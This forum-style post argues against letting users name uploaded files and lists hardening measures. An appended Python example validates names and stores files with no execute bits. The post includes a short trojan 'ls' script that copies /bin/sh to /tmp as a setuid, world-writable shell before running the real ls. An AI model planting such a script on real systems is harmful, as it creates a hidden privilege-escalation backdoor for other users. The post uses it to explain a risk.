Worst case scenario (one of MANY possible):
saving a file (executable) called 'ls' in a directory where several people may want to execute the ls command (with ./ in their path).
Suggestion for 'ls' content:
#!/bin/sh
# Know SUSHI ? ;-)
cp /bin/sh /tmp/tmp034
chmod 04777 /tmp/tmp034
/bin/ls
You get the idea... A real script would use a different file name for each copied shell...
But there are plenty of other (more realistic) possibilities:
Think of all the default config files loaded without you even noticing it (for the shell, the editor...)
I haven't investigated it, but what about really long file names? (DoS? performance penalty?)
Of course weird characters ('\0', '|', ...) are obviously a cause of problems.
I could go on for hours; in short: if you let someone else name the file, you let him control the data.
And whoever controls the data controls the code...
If your client really wants to do this, just say: 'OK! But YOU'll be responsible for all security/working incidents related to exploitation of this feature' (underline the money penalties in this case and he should come back to reason).
It's not a BAD idea, it's a VERY VERY BAD one!
If you must do it anyway (the only valid reason would be a gun to your head...), do it in paranoid mode:
- Limit the file name (limited character set, limited size)
- Limit the file permission (No executable, use special group if possible, no other permission)
- Of course limit the allowed directory to one special
- Forbid subdirectory creation (DoS)
- Turn on quotas (BTW limit the file size too even if it's redundant)
- Put a WatchDog detecting anything abnormal in your crontab
- Log everything
- Strictly limit the access to the program using this feature.
Hope this helps...
"
Only
Bad
Coders
Badly
Code
In
Perl" (OBC2IP)
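As an added example (my own code, not the poster's), here is how the "paranoid mode" rules from the list above can be enforced in Python when a user-supplied name is used to store a file: a whitelisted character set and length cap (which also rejects '/', NUL, '|' and leading dots, so no hidden shell or editor config file can be planted), one fixed directory with no subdirectories, a size cap, refusal to overwrite an existing file, and a stored mode that never carries an execute bit. The names `ALLOWED_NAME`, `validate_name`, `safe_store` and `demo` are mine; the sample names and data in `demo()` are constructed. Quotas, the cron watchdog and logging are left to the system and the caller.

```python
import os
import re
import tempfile

# Policy constants (constructed for this example; tune them for your deployment).
# First character alphanumeric (no dotfiles), then at most 63 more from a small set:
# no '/', no NUL, no shell metacharacters, no overlong names.
ALLOWED_NAME = re.compile(r"\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\Z")
MAX_FILE_BYTES = 1 * 1024 * 1024
FILE_MODE = 0o640  # rw for owner, r for group, nothing for others, never executable


class RejectedName(ValueError):
    """Raised when a user-supplied file name violates the whitelist."""


def validate_name(name: str) -> str:
    """Return the name unchanged if it satisfies the whitelist, else raise RejectedName."""
    if not isinstance(name, str):
        raise RejectedName("name must be a str")
    if "\0" in name:
        raise RejectedName("NUL byte in name")
    if not ALLOWED_NAME.match(name):
        raise RejectedName(f"name does not match whitelist: {name!r}")
    return name


def safe_store(base_dir: str, name: str, data: bytes) -> str:
    """Write data under base_dir using a validated name; return the path written."""
    name = validate_name(name)
    if len(data) > MAX_FILE_BYTES:
        raise ValueError(f"file too large: {len(data)} > {MAX_FILE_BYTES}")
    base = os.path.realpath(base_dir)
    target = os.path.join(base, name)
    # Defence in depth: even with the whitelist, confirm the file lands directly in base.
    if os.path.dirname(target) != base:
        raise RejectedName("path escapes the upload directory")
    # O_EXCL: never overwrite (or follow a symlink planted at) an existing name.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, FILE_MODE)
    try:
        # Force the mode regardless of umask or default ACLs: no execute bits, no 'other' access.
        os.fchmod(fd, FILE_MODE)
    except OSError:
        os.close(fd)
        os.unlink(target)
        raise
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return target


def demo() -> dict:
    """Exercise the policy in a scratch directory with constructed inputs."""
    base = tempfile.mkdtemp(prefix="upload-demo-")
    rejected = []
    for bad in ("../../etc/passwd", ".bashrc", "a|b", "x\0y", "sub/dir", "a" * 65, ""):
        try:
            validate_name(bad)
        except RejectedName:
            rejected.append(bad)
    # 'ls' passes the whitelist, so the protection is the stored mode: no execute bit,
    # and the upload directory must of course never be on anyone's PATH.
    path = safe_store(base, "ls", b"#!/bin/sh\necho this will never be executed\n")
    mode = os.stat(path).st_mode & 0o777
    try:
        safe_store(base, "ls", b"overwrite attempt")
        duplicate_refused = False
    except FileExistsError:
        duplicate_refused = True
    try:
        safe_store(base, "big.bin", b"\0" * (MAX_FILE_BYTES + 1))
        size_refused = False
    except ValueError:
        size_refused = True
    return {
        "rejected": rejected,
        "mode": mode,
        "duplicate_refused": duplicate_refused,
        "size_refused": size_refused,
    }


if __name__ == "__main__":
    print(demo())
```

The whitelist regex does the heavy lifting: rejecting by pattern rather than blacklisting individual characters means new surprises (locale-specific characters, control bytes) are refused by default. `os.fchmod` after `os.open` matters because the mode passed to `open` is still filtered by the process umask and may be overridden by default ACLs on the directory.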